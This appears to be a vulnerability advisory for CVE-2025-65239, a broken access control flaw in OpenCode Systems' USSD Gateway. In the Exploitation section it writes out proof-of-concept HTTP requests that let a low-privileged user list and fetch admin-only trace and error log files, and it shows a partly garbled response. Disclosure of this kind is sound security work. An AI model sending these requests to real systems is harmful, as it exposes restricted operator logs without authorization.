[CVE-2025-65239] USSD Gateway Broken Access Control - Logs

Technical information about the CVE-2025-65239 in OpenCode USSD GW application.

Description

Broken Access Control in the USSD Gateway application offered by OpenCode Systems allows the user who low privileged access to enumerate all the trace/error log files which is restricted to be accessed from the admin accounts.

Application Details

  • Name: USSD Gateway

  • Vendor: OpenCode Systems

  • Version: OC Release 5 - Version 6.13.11

Technical Details

  • Vulnerable Endpoint "All files": /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=ListFiles&op_param=SERVER-NAME;/aux1/ocussd/trace/;59&op_construct_param=1

  • Vulnerable Endpoint "Specific file": /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=GetFile&op_param=SERVER-NAME;/aux1/ocussd/trace/trace[...].log

Exploitation

The vulnerability allows the low privileged user to enumerate the trace and error log files as an admin user.

From the low priviliged user, use the below request

GET /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=ListFiles&op_param=SERVER-NAME;/aux1/ocussd/trace/;59&op_construct_param=1 HTTP/2
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Cookie: OCPANEL-SESSIONID=4a[...]os0; openid-state=b10[...]12%3A%22openid-state%22%3B[...]B%7D; _csrf=f0db[...]%3B%7D
[...]
HTTP/2 200 OK
Cache-Control: private-control
Pragna: no-cache
[...]

callback ( '<TABLE width="100% border=0 cellpadding="@" cellspacing=0 align=center › <T R><TD width=100% valign=top align=right › ‹TABLE width="100%" border=0 cellpad ding=2 cellspacing=2 height=30 class=txt> ‹TR><TD valign="top" align=left wid th=70%>Directory: <b>/auxl/ocussd/trace/</b>‹/TD› <TD valign="top" width=30% align=right class=txt>‹b>Server: SERVER-NAME</b></TD></TR> </table></td>‹ /TR> <try<td align=1eft><p> ‹table width="100%" border=0 cell padding=2 cellspacing=2 class=txt align=left><tr class="tablehdr" style="height: 17px;"> «td class="txt_head" style="width: 40%; text-align: center; white-space: novrap;">File Name</td><td class="txt_head" style="width: 20%; text-align: center; white-space: nowrap; "Date</td>td_class="txt head" stvle="width: 10%: text-alion: center: white-snace: [...]

[...]

Additionally, you can choose a specific file using the below request

GET /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=GetFile&op_param=SERVER-NAME;/aux1/ocussd/trace/trace[...].log HTTP/2
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Cookie: OCPANEL-SESSIONID=4a[...]os0; openid-state=b10[...]12%3A%22openid-state%22%3B[...]B%7D; _csrf=f0db[...]%3B%7D
[...]
Previous[CVE-2025-65236] USSD Gateway SQL Injection - SessionsNext[CVE-2025-65238] USSD Gateway Broken Access Control - Sessions

Last updated